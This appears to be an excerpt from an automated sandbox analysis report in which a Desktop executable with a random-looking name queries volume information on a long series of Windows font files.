          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
